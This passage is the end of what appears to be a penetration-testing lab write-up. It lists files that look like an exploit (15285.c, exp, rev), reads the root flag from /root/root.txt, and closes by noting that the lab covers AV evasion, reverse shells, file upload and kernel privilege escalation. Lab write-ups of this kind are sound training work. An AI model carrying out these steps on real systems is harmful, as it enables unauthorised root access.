15285.c a.out exp f rev
## cd /root
cd /root
## ls
ls
root.txt
## cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
```
Takeaways
This environment is genuinely well built; it mainly tests AV evasion, second-stage reverse shells, file upload, kernel privilege escalation and so on.